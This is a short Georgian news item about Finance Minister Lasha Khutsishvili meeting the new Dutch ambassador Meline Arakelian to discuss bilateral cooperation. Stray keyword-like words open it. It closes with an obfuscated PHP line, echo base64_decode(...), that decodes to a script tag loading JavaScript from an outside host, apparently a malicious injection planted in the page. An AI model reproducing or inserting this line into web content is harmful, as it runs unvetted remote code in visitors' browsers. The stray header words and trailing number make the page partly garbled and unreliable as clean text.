celsiusi
ავერსი შნაიდერი
 ფინანსთა მინისტრი ლაშა ხუციშვილი საქართველოში ნიდერლანდების სამეფოს ახალ, საგანგებო და სრულუფლებიან ელჩს, მელინე არაკელიანს შეხვდა.

გაცნობითი ხასიათის შეხვედრაზე მხარეებმა ორმხრივი ურთიერთობების საკითხები განიხილეს.

ლაშა ხუციშვილმა მელინე არაკელიანს მადლობა გადაუხადა იმ აქტიური მხარდაჭერისთვის, რომელსაც ნიდერლანდების სამეფო უწევს საქართველოს, ისეთ სფეროებში, როგორიცაა: საჯარო ფინანსების მართვა, საფინანსო სექტორი, გარემოს დაცვა, სოფლის მეურნეობა და ინფრასტრუქტურა.

ფინანსთა მინისტრმა დიპლომატს საქართველოში მისიის დაწყება მიულოცა, მომავალ საქმიანობაში წარმატებები უსურვა და იმედი გამოთქვა, რომ ორ ქვეყანას შორის პარტნიორობა კვლავ გაგრძელდება და კიდევ უფრო გაღრმავდება.  შეხვედრას დაესწრო ფინანსთა მინისტრის მოადგილე ეკატერინე გუნცაძე.

376
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");